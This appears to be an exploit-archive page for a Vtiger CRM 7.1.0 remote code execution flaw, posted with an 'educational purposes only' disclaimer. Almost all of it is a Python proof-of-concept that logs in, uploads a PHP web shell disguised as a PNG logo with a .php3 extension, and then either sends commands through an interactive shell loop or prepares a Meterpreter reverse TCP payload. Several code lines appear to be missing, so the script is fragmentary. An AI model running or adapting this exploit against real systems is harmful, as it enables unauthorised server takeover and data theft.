Exploits / Vulnerability Discovered : 2019-01-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Vtiger crm 7.1.0 remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Vtiger CRM 7.1.0 - Remote Code Execution
# Date: 2018-12-27
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://sourceforge.net/projects/vtigercrm/files/latest/download
# Version: v7.1.0
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software Description : Vtiger CRM enables sales, support, and marketing teams to
# organize and collaborate to measurably improve customer experiences and business outcomes.
# Description : This application has the vulnerability of uploading files with the extension "php3" in the logo upload field.
# But the uploaded file must be in PNG format and size 150X40.
# We can put PHP code into image source. After you make the extension "php3", the PHP code that we've placed can work.
# Therefore, PHP code can be executed using "<? ?>" Tags in PNG format file.
# ==================================================================
# I have exploited in 2 different ways.
# First one uploads a basic php shell for you and lets you control it through the console.
# Second one uploads the php meterpreter payload to the target site and lets you set this payload.
# PoC:
import mechanize, sys, cookielib, requests
import colorama, urllib, re, random
from colorama import Fore
def bannerche():
print '''
| Vtiger CRM 7.1.0 - Remote Code Execution Exploit |
| Vulnerability discovered by AkkuS |
| My Blog - https://pentest.com.tr |
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <RHOST>"
title = br.title()
if title == "Dashboard": # Access control
print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")
print (Fore.GREEN + "+ [*] Login successful")
print (Fore.RED + "+ [*] User information is incorrect.")
# Introducing Cookie and CSRF token information
check = requests.get("http://"+rhost+"/index.php?module=Vtiger&parent=Settings&view=CompanyDetails&block=8&fieldid=14", cookies=cj)
x = br._ua_handlers['_cookies'].cookiejar
c = str(x)
sonuc = re.findall(r"([a-fA-F\d]{32})", c)
g = sonuc[0]
v = str(g)
print (Fore.YELLOW + "+ [*] PHPSESSID = " + v)
# Random value fetching
boundary = ''.join(str(random.randint(0,9)) for _ in xrange(29))
filename = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php3"
print (Fore.BLUE + "+ [*] Select shell type:")
print (Fore.YELLOW +"- [*] 1 - Basic Shell")
print ("- [*] 2 - Meterpreter Shell")
choose = int(raw_input("- [*] Enter a number (1 or 2) : "))
if choose == 1:
Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Basic_data)
if Basic.status_code == 200:
print (Fore.GREEN + "+ [*] Shell successfully uploaded!")
print (Fore.GREEN + "+ [*] Shell Directory = http://"+rhost+"/test/logo/"+filename+"?cmd=[Command Here]")
while True:
shellctrl = requests.get("http://"+rhost+"/test/logo/"+filename+"")
if shellctrl.status_code == 200:
Command = str(raw_input(Fore.WHITE + "shell> "))
URL = requests.get("http://"+rhost+"/test/logo/"+filename+"?cmd="+Command+"")
print URL.text
print (Fore.RED + "+ [X] Unable to upload or access the shell")
elif choose == 2:
print("+ [*] In this option, you must listen to LHOST and LPORT with your Metasploit.")
print(Fore.RED + "+ [*] You should use the "+Fore.WHITE +"php/meterpreter/reverse_tcp"+Fore.RED +" payload")
print(Fore.YELLOW + "+ [*] Enter metasploit handler settings.")